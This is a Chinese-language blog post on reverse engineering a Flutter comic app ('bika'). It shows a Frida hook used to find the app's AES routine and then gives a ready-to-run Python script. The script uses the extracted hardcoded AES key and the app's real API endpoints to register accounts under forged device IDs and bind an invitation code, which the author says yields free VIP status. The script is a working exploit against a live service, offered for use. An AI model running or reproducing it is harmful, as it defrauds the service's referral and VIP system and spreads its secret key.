某h软件 bika

bika 动漫,dddd

flutter 以前用过，但是没有arm64的so，所有就放弃了，今天一个朋发给我，发现居然后arm64的，那就别挂我不客气。

blutter 启动，dart 2.19 解析出来了

主要是事看pp.txt和 addNames.py 这两个文件，找关键字，看有地址的，一般这种软件加密都是aes，所以直接搜索，安后挨个挨个frida hook，

blutter 会生成一个blutter_frida.js, 添加一句话

    const fn_addr = 0x7e1018;
    Interceptor.attach(libapp.add(fn_addr), {
        onEnter: function () {
            init(this.context);
            let objPtr = getArg(this.context, 0);
            const [tptr, cls, values] = getTaggedObjectValue(objPtr);
            console.log(`${cls.name}@${tptr.toString().slice(2)} =`, JSON.stringify(values, null, 2));
		    //就是添这句话,找关键字就行了, 
            console.log('hexdump ==> '+hexdump(objPtr));
        }
    });

多hook 几次基本拿下，然后就是猜，deviceId忙猜随机生成，拿uuid做md5去前16位，直接传上去，发现可以，最后就是喜闻乐见得绑定邀请码获得VIP，直接就是稳稳得拿下。

图片.png

import requests, time, json, uuid ,hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

code='YMMTK'
cipher = AES.new(b'525202f9149e061d', AES.MODE_ECB)

def get_header():
    return {
        'user-agent': 'Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleDart/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17',
        'version': '1.0',
        'devicetype': 'android',
        'time': str(int(time.time()*1000)),
        'host': 'api.bkrezwvjkc.com',
        'content-type': 'application/x-www-form-urlencoded',
    }
def remove_pkcs7_padding(data: bytes, block_size: int = 16):
    if len(data) % block_size != 0:
        raise ValueError("Data length is not a multiple of the block size")

    padding_length = data[-1]
    if padding_length > block_size or padding_length <= 0:
        raise ValueError("Invalid padding detected")

    padding = data[-padding_length:]
    if any(byte != padding_length for byte in padding):
        raise ValueError("Inconsistent padding detected")

    return data[:-padding_length]

def en(map):
    plaintext_bytes_padded = pad(json.dumps(map).encode(), AES.block_size)
    return cipher.encrypt(plaintext_bytes_padded).hex()
def de(s):
    a=cipher.decrypt(s)
    a=remove_pkcs7_padding(a)
    return json.loads(a.decode().replace('\r','').replace('\\\\','\\'))

def device_id():
    random_uuid = uuid.uuid4()
    uuid_str = str(random_uuid)
    return hashlib.md5(uuid_str.encode()).hexdigest()[:16]

def get_token():
    dviceId=device_id()
    map={"token":"","deviceId":dviceId,"data":{"app_code":"ch2","clipboard_text":"","channel_code":"channel://zwkab1bk"}}
    result=requests.post('http://api.bkrezwvjkc.com/cxapi/system/info',headers=get_header(),data=en(map))
    json_str=de(result.content)
    print(json_str)
    return json_str['data']['token']['token'], json_str['data']['token']['user_id'], dviceId


def bind():
    token, uid, device_id=get_token()
    map={'token':token+'_'+uid,'deviceId':device_id,'data':{'code':code}}
    response = requests.post('http://api.bkrezwvjkc.com/cxapi/user/bindParent', headers=get_header(), data=en(map))

    json_str=de(response.content)
    print(json_str)


bind()